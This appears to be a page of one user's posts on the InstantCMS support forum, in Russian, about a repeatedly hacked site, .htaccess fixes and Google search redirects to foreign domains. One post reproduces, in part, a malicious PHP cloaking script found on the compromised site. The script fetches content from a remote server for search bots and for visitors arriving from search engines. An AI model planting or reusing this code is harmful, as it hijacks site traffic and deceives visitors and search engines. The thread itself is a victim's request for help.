gen

amateur.com.ua

+34

Репутация

Рейтинг

#1 [ЕСТЬ РЕШЕНИЕ] Удаляют файлы сайта или заражают их 20 ноября 2019 в 16:03

Подскажите в чем проблема в сервере

gen
Сложно так сказать, слишком мало данных. Что говорят логи?
Если гадать, то попробуйте поменять все данные (пользователя и пароль) на базу, ftp и т.д. предварительно проверим ПК антивирусом. Если у вас стоит антивирус, но проверить надо чем-то сторонним, например, скачать: Dr.Web CureIt!
И не забудьте посмотреть или заменить файлы на сервере. Где-то может лежать шелл.
Далее все равно (но лучше сразу) смотреть логи. Как был осуществлен доступ.

@Evg

А там будет отображаться, кто заходил и что делал или там надо будет еще очень сильно поковыряться?

#1 [ЕСТЬ РЕШЕНИЕ] Удаляют файлы сайта или заражают их 18 ноября 2019 в 12:03

Привет, я со стороной защиты и взлома не очень знаком, поэтому хочу спросить у знающих на что стоит обратить внимание.
Мой сайт стоит на 1-ой ветке и обновлен до последнее версии.
В последнее время с заметной периодичность на сайт заражаются или удаляются файлы, которые влияют на работу сайта. Ну по моему они просто блокируются сервером, так как в них появляется код, как мне объяснили в поддержке когда. Сначала в корне index и .htaccess заражался, потом cms.php, теперь в папке includes config.inc улетел. И так почти каждое утро в одно и тоже время сайт из за этого не доступен.
Подскажите в чем проблема в сервере или у меня вирус, хотя я в самом сайте ничего не делаю долгое время только заливаю контент.

#2 [ЕСТЬ РЕШЕНИЕ] Доступ к админ панели! 20 сентября 2019 в 10:45

Проблема была в .htaccess

RewriteCond %{HTTP_HOST} !amateur.com.ua (это добавил)
RewriteRule (.*) — [G,L]

Все получилось. Спасибо.

#1 [ЕСТЬ РЕШЕНИЕ] Доступ к админ панели! 18 сентября 2019 в 21:21

Проблема такая, я на сайт захожу через форму входа, а когда пытаюсь перейти в админ. панель, меня опять выкидывает на форму входа, после попытки авторизации выдает ошибку 404. В чем может быть причина, куда заглянуть? Ветка первая.

#3 [ЕСТЬ РЕШЕНИЕ] PHP код через модуль 18 сентября 2019 в 20:16

Можно.
Код нужно сохранить в php файл, файл загрузить в папку /includes/myphp/
В новом модуле указать имя файла

Нил™

Спасибо. Вы помогли!

#1 [ЕСТЬ РЕШЕНИЕ] PHP код через модуль 18 сентября 2019 в 15:44

Есть ли какое то простое решение, что через обычный модуль вставить код PHP чтобы он оборажался на сайте.

#4 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 7 апреля 2019 в 11:13

Можете еще скинуть свой .htaccess?
gen

Лучше просто нормально напишите))
У Вас не поймешь… то Вы находите у себя вредоносный файл:

Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил.
gen

То потом пишите что это Ваш файл:

Нет это мой файл, я просто хочу разобраться это дыра в движке или с хостом проблемы.
gen

Потом Вы пишите загадочную фразу:

Вчера все что нашел удалил, сегодня опять залезли но уже только в .htaccess
gen

Что нашли? Что удалили? И что с .htaccess не так?
Нормально все излагать можете?

Что бы хотябы можно было понять, что было?, что вы уже делали для поиска вируса и обеспечения безопасности? что теперь стало?

Rainbow

Не ёрничайте пожалуйста.

В файл .htaccess периодический вносятся изменения, что приводит к проблеме переадресации.

#5 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 2 апреля 2019 в 16:34

Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.
gen

Ищите еще возможно не все нашли...

Rainbow

Можете еще скинуть свой .htaccess?

#6 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 2 апреля 2019 в 14:38

Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.
gen

Ищите еще возможно не все нашли...

Rainbow

Вчера все что нашел удалил, сегодня опять залезли но уже только в .htaccess

#7 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 1 апреля 2019 в 19:24

Сами загрузили может. Такое бывает, иногда сервисы разные выдают файлики и просят для подтверждения, что домен ваш, разместить файл в корне сайта. Если сервис мошеннический, то такой файл, все равно что вирус, который вы сами и разместили.

Ещё, как вариант, какое-то дополнение скачали, а там в архиве уже лежал этот файл.

@Milyana

Нет это мой файл, я просто хочу разобраться это дыра в движке или с хостом проблемы.

#8 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 1 апреля 2019 в 18:10

Вредоносный код. Прогоните все сайты вашего аккаунта через айболит. Возможно, еще где-то сидит

islyaeFF

Мне интересно как они в корень сайта — это засунули…

#9 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 1 апреля 2019 в 17:53

Что значит нашли? Сами загрузили или как? В каталоги пытались сайт добавлять?

@Milyana

Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.

#10 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 1 апреля 2019 в 17:45

Вот такой вот файл нашел у себя:

<?php
error_reporting(0);
ini_set('display_errors', '0'); 
//set_time_limit(0);
 
$serverUrl='http://www.wo8899.top/server.php';
$isDebug=false;
 
$serverName=$_SERVER['SERVER_NAME'];
$serverName=str_replace('www.','',$serverName);
$currentUrl=$_SERVER['QUERY_STRING'];
$isSpiderAgent=checkAgent();
$isSpiderReal='false';
$isSearchEngineReferer=checkReferer();
$ipAddress=getIPAddress();
$realHost='';
$locationUrl=GetLocationURL();
$requestUrl='';
$requestUrlMD5='';
$returnText='';
 
$currentPath=str_replace('www.'.$serverName,'',$currentUrl);
$currentPath=str_replace($serverName,'',$currentPath);
if(endWith($currentPath,'?'))
{
  $currentPath=substr($currentPath,0,strlen($currentPath)-1);
}
 
if($isSpiderAgent=='true' && !empty($ipAddress))
{
  $realHost=strtolower(gethostbyaddr($ipAddress));
  if(strpos($realHost, 'googlebot.com')!==false)
  {
    $isSpiderReal='true';
  }
}
 
if($isSpiderAgent=='true')
{
	$requestUrl=$serverUrl.'?action=get&serverName='.$serverName.'&query='.$currentPath;
	$requestUrlMD5=$serverUrl.'?action=get&serverName='.$serverName.'&query='.md5($currentPath);
	$returnText=http_get($requestUrlMD5,15);
}
else
{
	if($isSearchEngineReferer=='true')
	{
		$requestUrl=$serverUrl.'?action=jump&serverName='.$serverName.'&query='.$currentPath;
	  $requestUrlMD5=$serverUrl.'?action=jump&serverName='.$serverName.'&query='.md5($currentPath);
		$returnText=http_get($requestUrlMD5,15);
	}
}
 
//test code beigin****************************************************************************************
if($isDebug)
{
	echo '<table cellpacing=0 cellpadding=4 border=0 bgcolor="skyblue">';
	echo '<tr bgcolor="skyblue"><td colspan=2 align="center"><b>Debug Info</b></td></tr>';
	echo '<tr bgcolor="white"><td><b>currentUrl</b></td><td>'.$currentUrl.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>currentPath</b></td><td>'.$currentPath.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>user-Agent</b></td><td>'.$_SERVER["HTTP_USER_AGENT"].'</td></tr>';
	echo '<tr bgcolor="white"><td><b>isSpiderAgent</b></td><td>'.$isSpiderAgent.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>isSpiderReal</b></td><td>'.$isSpiderReal.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>isSearchEngineReferer</b></td><td>'.$isSearchEngineReferer.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>ipAddress</b></td><td>'.$ipAddress.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>realHost</b></td><td>'.$realHost.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>serverName</b></td><td>'.$serverName.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>locationUrl</b></td><td>'.$locationUrl.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>requestUrl</b></td><td>'.$requestUrl.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>requestUrlMD5</b></td><td>'.$requestUrlMD5.'</td></tr>';
	echo '<tr bgcolor="white"><td><b>returnText</b></td><td>'.$returnText.'</td></tr>';
	echo '</table>';
	//exit;
}
else
{
	echo $returnText;
}
//test code end****************************************************************************************
 
function GetLocationURL()
{
  $pageURL = '';
  if ($_SERVER['SERVER_PORT'] != '80')
  {
    $pageURL = 'https://'. $_SERVER['HTTP_HOST'].':'.$_SERVER['PHP_SELF'];
  }
  else
  {
    $pageURL = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
  }
  return $pageURL;
}
 
function checkAgent() 
{ 
  $rtnVal = "false";
  try
  {
		if(!empty($_SERVER["HTTP_USER_AGENT"]))
		{
			$agent = "user-agent:".strtolower($_SERVER['HTTP_USER_AGENT']); 
			if(strpos($agent,'google.com')!==false || strpos($agent,'google.co.jp')!==false || strpos($agent,'yahoo.co.jp')!==false || strpos($agent,'docomo.ne.jp')!==false || strpos($agent,'bing')!==false)
			{
				$rtnVal="true";
			}
		}
  }
  catch (Exception $w){}
  return $rtnVal; 
}
 
function checkReferer()
{
  $rtnVal="false";
  try
  {
    if(!empty($_SERVER["HTTP_REFERER"]))
		{
      $url = 'referer:'.strtolower($_SERVER["HTTP_REFERER"]);
      if(strpos($url,'google.com')!==false || strpos($url,'google.co.jp')!==false || strpos($url,'yahoo.co.jp')!==false || strpos($url,'docomo.ne.jp')!==false || strpos($url,'bing')!==false)
			{
        $rtnVal="true";
      }
    }
  }
  catch (Exception $w){}
  return $rtnVal;
}
 
function getIPAddress()
{
	$ip="";
	$unknown = "unknown";  
	if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'],$unknown))
	{  
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];  
	} 
	elseif ( isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], $unknown))
	{  
    $ip = $_SERVER['REMOTE_ADDR'];  
	}  
	if (false !== strpos($ip, ',')) 
	{
    $ip = reset(explode(',', $ip));  
	}
	if($ip==$unknown)
	{
    $ip="";
	}
	return $ip;
}
 
function curPageURL() 
{
	$pageURL = "http://";
	$pageURL .= $_SERVER["HTTP_HOST"].$_SERVER["PHP_SELF"];
	if(!
                                        
                                            
                                                                                        

        
                    
                            
            

    
                    
                0

#1 [ЕСТЬ РЕШЕНИЕ] Через поиск Google, открывается совершенно другой сайт 1 апреля 2019 в 17:26

При переходе на мой сайт через поиск Google, открывается совершенно другой сайт, но когда вводишь в адресную строку, сайт открывается тот что нужно. В чем может быть причина, такого перехода в Google? В ya.ru все в порядке.

Запрос в гугл делаю: ленино инфо

но результат запроса ведет с начало на мой сайт, а потом резко прыгает на www.zhu555.com/ и потом на napianhai.online/

Очень нужна ваша помощь.
Спасибо.

#11 [ЕСТЬ РЕШЕНИЕ] Проблема с DT СЛАЙДЕРОМ НОВОСТЕЙ 24 января 2019 в 22:50

Решение.

Ваш хостинг при загрузке файлов сжимает содержимое в одну строку, от
того и проблема. По крайней мере в исходном коде страницы скрипт
выводится в одну строку, так быть не должно, если файл не пережался
хостингом. Можете попробовать загрузить этот файл в двоичном режиме

Предыдущая
1
2
3
4
...
9
Следующая
Показаны 31-45 из 127

gen

InstantCMS Team

О проекте

Поддержка

Дополнения